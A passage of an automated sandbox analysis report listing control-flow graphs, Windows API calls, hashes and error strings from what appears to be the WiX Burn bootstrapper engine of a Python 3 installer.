                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$c:\agent\_work\138\s\src\burn\engine\registration.cpp$clbcatq.dll$msasn1.dll$yes
                                                                                                                                  • API String ID: 760788290-3749624492
                                                                                                                                  • Opcode ID: e9723560c5aed729b61df3353c7b789e51437e41e1e89670bbf0fb8b3ba2a533
                                                                                                                                  • Instruction ID: e77da84d75897d3e2cb1c6a3e0b4aa9bb37bb50e4ebc95b352512a479dcc19a7
                                                                                                                                  • Opcode Fuzzy Hash: e9723560c5aed729b61df3353c7b789e51437e41e1e89670bbf0fb8b3ba2a533
                                                                                                                                  • Instruction Fuzzy Hash: 4EE1F676A40625BBCB127AA0CC51FAEB6646B01714F214A37FE10B73A1D72CAE0597CC

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 394 48b54b-48b5c0 call 4af710 * 2 399 48b5f8-48b5fe 394->399 400 48b5c2-48b5cc GetLastError 394->400 401 48b600 399->401 402 48b602-48b614 SetFilePointerEx 399->402 403 48b5d9 400->403 404 48b5ce-48b5d7 400->404 401->402 407 48b648-48b662 ReadFile 402->407 408 48b616-48b620 GetLastError 402->408 405 48b5db 403->405 406 48b5e0-48b5ed call 4838f5 403->406 404->403 405->406 423 48b5f2-48b5f3 406->423 409 48b699-48b6a0 407->409 410 48b664-48b66e GetLastError 407->410 412 48b62d 408->412 413 48b622-48b62b 408->413 417 48b6a6-48b6af 409->417 418 48bc97-48bcab call 4838f5 409->418 414 48b67b 410->414 415 48b670-48b679 410->415 419 48b62f 412->419 420 48b634-48b646 call 4838f5 412->420 413->412 421 48b67d 414->421 422 48b682-48b694 call 4838f5 414->422 415->414 417->418 425 48b6b5-48b6c5 SetFilePointerEx 417->425 436 48bcb0 418->436 419->420 420->423 421->422 422->423 428 48bcb1-48bcb7 call 4c0657 423->428 430 48b6fc-48b714 ReadFile 425->430 431 48b6c7-48b6d1 GetLastError 425->431 450 48bcb8-48bcc8 call 4ade30 428->450 433 48b74b-48b752 430->433 434 48b716-48b720 GetLastError 430->434 438 48b6de 431->438 439 48b6d3-48b6dc 431->439 443 48b758-48b762 433->443 444 48bc7c-48bc95 call 4838f5 433->444 440 48b72d 434->440 441 48b722-48b72b 434->441 436->428 445 48b6e0 438->445 446 48b6e5-48b6f2 call 4838f5 438->446 439->438 448 48b72f 440->448 449 48b734-48b741 call 4838f5 440->449 441->440 443->444 451 48b768-48b78b SetFilePointerEx 443->451 444->436 445->446 446->430 448->449 449->433 457 48b78d-48b797 GetLastError 451->457 458 48b7c2-48b7da ReadFile 451->458 463 48b799-48b7a2 457->463 464 48b7a4 457->464 459 48b7dc-48b7e6 GetLastError 458->459 460 48b811-48b829 ReadFile 458->460 469 48b7e8-48b7f1 459->469 470 48b7f3 459->470 465 48b82b-48b835 GetLastError 460->465 466 48b860-48b87b SetFilePointerEx 460->466 463->464 467 48b7ab-48b7b8 call 4838f5 464->467 468 48b7a6 464->468 471 48b842 465->471 472 48b837-48b840 465->472 474 48b87d-48b887 GetLastError 466->474 475 48b8b5-48b8d4 ReadFile 466->475 467->458 468->467 469->470 476 48b7fa-48b807 call 4838f5 470->476 477 48b7f5 470->477 480 48b849-48b856 call 4838f5 471->480 481 48b844 471->481 472->471 483 48b889-48b892 474->483 484 48b894 474->484 478 48b8da-48b8dc 475->478 479 48bc3d-48bc47 GetLastError 475->479 476->460 477->476 486 48b8dd-48b8e4 478->486 488 48bc49-48bc52 479->488 489 48bc54 479->489 480->466 481->480 483->484 490 48b89b-48b8ab call 4838f5 484->490 491 48b896 484->491 493 48bc18-48bc35 call 4838f5 486->493 494 48b8ea-48b8f6 486->494 488->489 496 48bc5b-48bc71 call 4838f5 489->496 497 48bc56 489->497 490->475 491->490 509 48bc3a-48bc3b 493->509 500 48b8f8-48b8ff 494->500 501 48b901-48b90a 494->501 514 48bc72-48bc7a call 4c0657 496->514 497->496 500->501 505 48b944-48b94b 500->505 506 48bbdb-48bbf2 call 4838f5 501->506 507 48b910-48b936 ReadFile 501->507 511 48b94d-48b96f call 4838f5 505->511 512 48b974-48b98b call 483a1a 505->512 521 48bbf7-48bbfd call 4c0657 506->521 507->479 510 48b93c-48b942 507->510 509->514 510->486 511->509 523 48b98d-48b9aa call 4838f5 512->523 524 48b9af-48b9c4 SetFilePointerEx 512->524 514->450 535 48bc03-48bc04 521->535 523->428 527 48ba04-48ba29 ReadFile 524->527 528 48b9c6-48b9d0 GetLastError 524->528 533 48ba2b-48ba35 GetLastError 527->533 534 48ba60-48ba6c 527->534 531 48b9dd 528->531 532 48b9d2-48b9db 528->532 539 48b9df 531->539 540 48b9e4-48b9f4 call 4838f5 531->540 532->531 536 48ba42 533->536 537 48ba37-48ba40 533->537 541 48ba6e-48ba8a call 4838f5 534->541 542 48ba8f-48ba93 534->542 538 48bc05-48bc07 535->538 544 48ba49-48ba5e call 4838f5 536->544 545 48ba44 536->545 537->536 538->450 543 48bc0d-48bc13 call 483adf 538->543 539->540 559 48b9f9-48b9ff call 4c0657 540->559 541->521 548 48bace-48bae1 call 4c4e3d 542->548 549 48ba95-48bac9 call 4838f5 call 4c0657 542->549 543->450 544->559 545->544 561 48baed-48baf7 548->561 562 48bae3-48bae8 548->562 549->538 559->535 565 48baf9-48baff 561->565 566 48bb01-48bb09 561->566 562->559 569 48bb1a-48bb7a call 483a1a 565->569 570 48bb0b-48bb13 566->570 571 48bb15-48bb18 566->571 574 48bb7c-48bb98 call 4838f5 569->574 575 48bb9e-48bbbf call 4aec10 call 48b2c8 569->575 570->569 571->569 574->575 575->538 582 48bbc1-48bbd1 call 4838f5 575->582 582->506
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0048B5C2
                                                                                                                                  • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B610
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0048B616
                                                                                                                                  • ReadFile.KERNELBASE(00000000,DHH,00000040,?,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B65E
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0048B664
                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B6C1
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B6C7
                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B710
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B716
                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B787
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B78D
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B7D6
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B7DC
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B825
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B82B
                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B877
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B87D
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B8D0
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B932
                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B9BC
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B9C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$c:\agent\_work\138\s\src\burn\engine\section.cpp$DHH
                                                                                                                                  • API String ID: 3411815225-353379213
                                                                                                                                  • Opcode ID: c0aec0a399b39340e8d80c6412fbb6ea10f6e3d2ddbe1d9805a5fde76e3d6cea
                                                                                                                                  • Instruction ID: eb9a06488d37ba9ec8bc5a45feac981b73435d2b5319140dd72c0d80f9fd83ff
                                                                                                                                  • Opcode Fuzzy Hash: c0aec0a399b39340e8d80c6412fbb6ea10f6e3d2ddbe1d9805a5fde76e3d6cea
                                                                                                                                  • Instruction Fuzzy Hash: 5812C376940225EFD760AA168C46FAF76A4EF04B10F1145ABFD04BB281EB7C9D408BDD

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 585 4a0bcf-4a0be6 SetEvent 586 4a0c28-4a0c36 WaitForSingleObject 585->586 587 4a0be8-4a0bf2 GetLastError 585->587 588 4a0c38-4a0c42 GetLastError 586->588 589 4a0c6d-4a0c78 ResetEvent 586->589 590 4a0bff 587->590 591 4a0bf4-4a0bfd 587->591 596 4a0c4f 588->596 597 4a0c44-4a0c4d 588->597 592 4a0c7a-4a0c84 GetLastError 589->592 593 4a0cb2-4a0cb8 589->593 594 4a0c01 590->594 595 4a0c06-4a0c16 call 4838f5 590->595 591->590 598 4a0c91 592->598 599 4a0c86-4a0c8f 592->599 601 4a0cba-4a0cbd 593->601 602 4a0ceb-4a0d04 call 4822e0 593->602 594->595 613 4a0c1b-4a0c23 call 4c0657 595->613 603 4a0c51 596->603 604 4a0c56-4a0c6b call 4838f5 596->604 597->596 605 4a0c98-4a0cad call 4838f5 598->605 606 4a0c93 598->606 599->598 608 4a0cbf-4a0cdc call 4838f5 601->608 609 4a0ce1-4a0ce6 601->609 618 4a0d1c-4a0d27 SetEvent 602->618 619 4a0d06-4a0d17 call 4c0657 602->619 603->604 604->613 605->613 606->605 629 4a0f97-4a0f9d call 4c0657 608->629 616 4a0fa1-4a0fa6 609->616 613->616 620 4a0fab-4a0fb1 616->620 621 4a0fa8 616->621 626 4a0d29-4a0d33 GetLastError 618->626 627 4a0d61-4a0d6f WaitForSingleObject 618->627 636 4a0f9e-4a0fa0 619->636 621->620 631 4a0d40 626->631 632 4a0d35-4a0d3e 626->632 633 4a0da9-4a0db4 ResetEvent 627->633 634 4a0d71-4a0d7b GetLastError 627->634 629->636 639 4a0d42 631->639 640 4a0d47-4a0d5c call 4838f5 631->640 632->631 637 4a0dee-4a0df5 633->637 638 4a0db6-4a0dc0 GetLastError 633->638 641 4a0d88 634->641 642 4a0d7d-4a0d86 634->642 636->616 649 4a0df7-4a0dfa 637->649 650 4a0e64-4a0e87 CreateFileW 637->650 646 4a0dcd 638->646 647 4a0dc2-4a0dcb 638->647 639->640 664 4a0f96 640->664 644 4a0d8a 641->644 645 4a0d8f-4a0da4 call 4838f5 641->645 642->641 644->645 645->664 652 4a0dcf 646->652 653 4a0dd4-4a0de9 call 4838f5 646->653 647->646 657 4a0dfc-4a0dff 649->657 658 4a0e27-4a0e2b call 483a1a 649->658 655 4a0e89-4a0e93 GetLastError 650->655 656 4a0ec4-4a0ed8 SetFilePointerEx 650->656 652->653 653->664 665 4a0ea0 655->665 666 4a0e95-4a0e9e 655->666 660 4a0eda-4a0ee4 GetLastError 656->660 661 4a0f12-4a0f1d SetEndOfFile 656->661 667 4a0e20-4a0e22 657->667 668 4a0e01-4a0e04 657->668 673 4a0e30-4a0e35 658->673 671 4a0ef1 660->671 672 4a0ee6-4a0eef 660->672 675 4a0f1f-4a0f29 GetLastError 661->675 676 4a0f54-4a0f61 SetFilePointerEx 661->676 664->629 677 4a0ea2 665->677 678 4a0ea7-4a0eba call 4838f5 665->678 666->665 667->616 669 4a0e16-4a0e1b 668->669 670 4a0e06-4a0e0c 668->670 669->636 670->669 683 4a0ef8-4a0f0d call 4838f5 671->683 684 4a0ef3 671->684 672->671 681 4a0e56-4a0e5f 673->681 682 4a0e37-4a0e51 call 4838f5 673->682 685 4a0f2b-4a0f34 675->685 686 4a0f36 675->686 676->636 680 4a0f63-4a0f6d GetLastError 676->680 677->678 678->656 690 4a0f7a 680->690 691 4a0f6f-4a0f78 680->691 681->636 682->664 683->664 684->683 685->686 687 4a0f38 686->687 688 4a0f3d-4a0f52 call 4838f5 686->688 687->688 688->664 695 4a0f7c 690->695 696 4a0f81-4a0f91 call 4838f5 690->696 691->690 695->696 696->664
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,004A077F,?,?), ref: 004A0BDE
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004A077F,?,?), ref: 004A0BE8
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,004A077F,?,?), ref: 004A0C2D
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004A077F,?,?), ref: 004A0C38
                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,?,?,004A077F,?,?), ref: 004A0C70
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004A077F,?,?), ref: 004A0C7A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 1865021742-4216264097
                                                                                                                                  • Opcode ID: 83f37199bc76e713ce7125f2333450536fcfe708994d5232f9a28d4bbe54fe79
                                                                                                                                  • Instruction ID: 5740ed110a5d904f3f0552e2342a04d6d92315b3b14ce13d16f4783b8241999b
                                                                                                                                  • Opcode Fuzzy Hash: 83f37199bc76e713ce7125f2333450536fcfe708994d5232f9a28d4bbe54fe79
                                                                                                                                  • Instruction Fuzzy Hash: 0A911537A81732ABD3312A654D0AF2B2954AF12B65F124227FE14BB7D0E79CDC1082DD

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 862 497523-497568 call 4af710 call 4876d4 867 49756a-49756f 862->867 868 497574-497585 call 48c4bb 862->868 869 49780d-497814 call 4c0657 867->869 873 497591-4975a2 call 48c322 868->873 874 497587-49758c 868->874 877 497815-49781a 869->877 883 4975ae-4975c3 call 48c57a 873->883 884 4975a4-4975a9 873->884 874->869 879 49781c-49781d call 48278d 877->879 880 497822-497826 877->880 879->880 881 497828-49782b call 48278d 880->881 882 497830-497835 880->882 881->882 887 49783d-49784a call 48c271 882->887 888 497837-497838 call 48278d 882->888 894 4975cf-4975df call 4abe03 883->894 895 4975c5-4975ca 883->895 884->869 896 49784c-49784f call 48278d 887->896 897 497854-497858 887->897 888->887 903 4975eb-49765e call 495c9e 894->903 904 4975e1-4975e6 894->904 895->869 896->897 901 49785a-49785d call 48278d 897->901 902 497862-497866 897->902 901->902 906 497868-49786b call 483adf 902->906 907 497870-497876 902->907 911 49766a-49766f 903->911 912 497660-497665 903->912 904->869 906->907 913 497671 911->913 914 497676-497691 call 485678 GetCurrentProcess call 4c0c8f 911->914 912->869 913->914 918 497696-4976ad call 488363 914->918 921 4976af 918->921 922 4976c7-4976de call 488363 918->922 923 4976b4-4976c2 call 4c0657 921->923 927 4976e0-4976e5 922->927 928 4976e7-4976ec 922->928 923->877 927->923 930 497748-49774d 928->930 931 4976ee-497700 call 488309 928->931 932 49776d-497776 930->932 933 49774f-497761 call 488309 930->933 941 49770c-49771c call 48355e 931->941 942 497702-497707 931->942 936 497778-49777b 932->936 937 497782-497796 call 49a4fa 932->937 933->932 944 497763-497768 933->944 936->937 940 49777d-497780 936->940 949 497798-49779d 937->949 950 49779f 937->950 940->937 945 4977a5-4977a8 940->945 953 497728-49773c call 488309 941->953 954 49771e-497723 941->954 942->869 944->869 951 4977aa-4977ad 945->951 952 4977af-4977c5 call 48d63d 945->952 949->869 950->945 951->877 951->952 958 4977ce-4977e6 call 48cc73 952->958 959 4977c7-4977cc 952->959 953->930 962 49773e-497743 953->962 954->869 964 4977e8-4977ed 958->964 965 4977ef-497806 call 48c996 958->965 959->869 962->869 964->869 965->877 968 497808 965->968 968->869
                                                                                                                                  Strings
                                                                                                                                  • Failed to set source process path variable., xrefs: 00497702
                                                                                                                                  • WixBundleSourceProcessFolder, xrefs: 0049772D
                                                                                                                                  • wininet.dll, xrefs: 00497648
                                                                                                                                  • Failed to get source process folder from path., xrefs: 0049771E
                                                                                                                                  • WixBundleOriginalSource, xrefs: 00497752
                                                                                                                                  • Failed to set source process folder variable., xrefs: 0049773E
                                                                                                                                  • Failed to get unique temporary folder for bootstrapper application., xrefs: 004977C7
                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 00497798
                                                                                                                                  • version.dll, xrefs: 004976CE
                                                                                                                                  • Failed to initialize variables., xrefs: 0049756A
                                                                                                                                  • Failed to open manifest stream., xrefs: 004975A4
                                                                                                                                  • Failed to extract bootstrapper application payloads., xrefs: 004977E8
                                                                                                                                  • Failed to load catalog files., xrefs: 00497808
                                                                                                                                  • Failed to parse command line., xrefs: 00497660
                                                                                                                                  • WixBundleElevated, xrefs: 0049769E, 004976AF
                                                                                                                                  • 5TH, xrefs: 00497546, 004975CF
                                                                                                                                  • Failed to open attached UX container., xrefs: 00497587
                                                                                                                                  • 5TH, xrefs: 0049770C, 0049772A, 0049770F
                                                                                                                                  • Failed to overwrite the %ls built-in variable., xrefs: 004976B4
                                                                                                                                  • Failed to set original source variable., xrefs: 00497763
                                                                                                                                  • WixBundleUILevel, xrefs: 004976CF, 004976E0
                                                                                                                                  • Failed to get manifest stream from container., xrefs: 004975C5
                                                                                                                                  • 5TH, xrefs: 00497828
                                                                                                                                  • WixBundleSourceProcessPath, xrefs: 004976F1
                                                                                                                                  • Failed to load manifest., xrefs: 004975E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                  • String ID: 5TH$5TH$5TH$Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel$version.dll$wininet.dll
                                                                                                                                  • API String ID: 32694325-1192761104
                                                                                                                                  • Opcode ID: e6de0d38d8e93473df8364368f4b0ab83f1e6c6248e5fd61aa35a5e553be579a
                                                                                                                                  • Instruction ID: 5657d94d76cf8489dc8e403d9c2a661e157993374771cd5633631a117951ebcf
                                                                                                                                  • Opcode Fuzzy Hash: e6de0d38d8e93473df8364368f4b0ab83f1e6c6248e5fd61aa35a5e553be579a
                                                                                                                                  • Instruction Fuzzy Hash: BBA18372A54615BBDF12EAA5CC85FEEBBACBB04704F10067BF504E6240D778A904C7E9

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1222 4a0fb4-4a0fe0 CoInitializeEx 1223 4a0fe2-4a0fef call 4c0657 1222->1223 1224 4a0ff4-4a103f call 4bf882 1222->1224 1229 4a1257-4a1267 call 4ade30 1223->1229 1230 4a1069-4a108b call 4bf8a3 1224->1230 1231 4a1041-4a1064 call 4838f5 call 4c0657 1224->1231 1239 4a1091-4a1099 1230->1239 1240 4a1145-4a1150 SetEvent 1230->1240 1251 4a1250-4a1251 CoUninitialize 1231->1251 1244 4a1248-4a124b call 4bf8b3 1239->1244 1245 4a109f-4a10a5 1239->1245 1241 4a118f-4a119d WaitForSingleObject 1240->1241 1242 4a1152-4a115c GetLastError 1240->1242 1247 4a119f-4a11a9 GetLastError 1241->1247 1248 4a11d1-4a11dc ResetEvent 1241->1248 1249 4a1169 1242->1249 1250 4a115e-4a1167 1242->1250 1244->1251 1245->1244 1246 4a10ab-4a10b3 1245->1246 1253 4a112d-4a1140 call 4c0657 1246->1253 1254 4a10b5-4a10b7 1246->1254 1255 4a11ab-4a11b4 1247->1255 1256 4a11b6 1247->1256 1257 4a11de-4a11e8 GetLastError 1248->1257 1258 4a1213-4a1219 1248->1258 1259 4a116b 1249->1259 1260 4a116d-4a117d call 4838f5 1249->1260 1250->1249 1251->1229 1253->1244 1261 4a10ca-4a10cd 1254->1261 1262 4a10b9 1254->1262 1255->1256 1266 4a11ba-4a11cf call 4838f5 1256->1266 1267 4a11b8 1256->1267 1268 4a11ea-4a11f3 1257->1268 1269 4a11f5 1257->1269 1263 4a121b-4a121e 1258->1263 1264 4a1243 1258->1264 1259->1260 1282 4a1182-4a118a call 4c0657 1260->1282 1275 4a10cf 1261->1275 1276 4a1127 1261->1276 1271 4a10bb-4a10bd 1262->1271 1272 4a10bf-4a10c8 1262->1272 1273 4a123f-4a1241 1263->1273 1274 4a1220-4a123a call 4838f5 1263->1274 1264->1244 1266->1282 1267->1266 1268->1269 1279 4a11f9-4a120e call 4838f5 1269->1279 1280 4a11f7 1269->1280 1284 4a1129-4a112b 1271->1284 1272->1284 1273->1244 1274->1282 1286 4a10eb-4a10f0 1275->1286 1287 4a10f9-4a10fe 1275->1287 1288 4a110e-4a1113 1275->1288 1289 4a111c-4a1121 1275->1289 1290 4a10dd-4a10e2 1275->1290 1291 4a10f2-4a10f7 1275->1291 1292 4a1123-4a1125 1275->1292 1293 4a1100-4a1105 1275->1293 1294 4a10d6-4a10db 1275->1294 1295 4a1107-4a110c 1275->1295 1296 4a10e4-4a10e9 1275->1296 1297 4a1115-4a111a 1275->1297 1276->1284 1279->1282 1280->1279 1282->1244 1284->1240 1284->1253 1286->1253 1287->1253 1288->1253 1289->1253 1290->1253 1291->1253 1292->1253 1293->1253 1294->1253 1295->1253 1296->1253 1297->1253
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004A0FD6
                                                                                                                                  • CoUninitialize.COMBASE ref: 004A1251
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 3442037557-3038769977
                                                                                                                                  • Opcode ID: 30d76e9f4d896a133738bbcc7892e4797e7be969f9ad52ae588aa5a283dda6ad
                                                                                                                                  • Instruction ID: ac109e0752dd236034c87286f6b230a46b2370c01da7fdb69591bb36c5c562a7
                                                                                                                                  • Opcode Fuzzy Hash: 30d76e9f4d896a133738bbcc7892e4797e7be969f9ad52ae588aa5a283dda6ad
                                                                                                                                  • Instruction Fuzzy Hash: 53515B77940331E7CB205A559C06F6B35549B67B20F26427BFE21BF3A0D62D8C0042DE

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
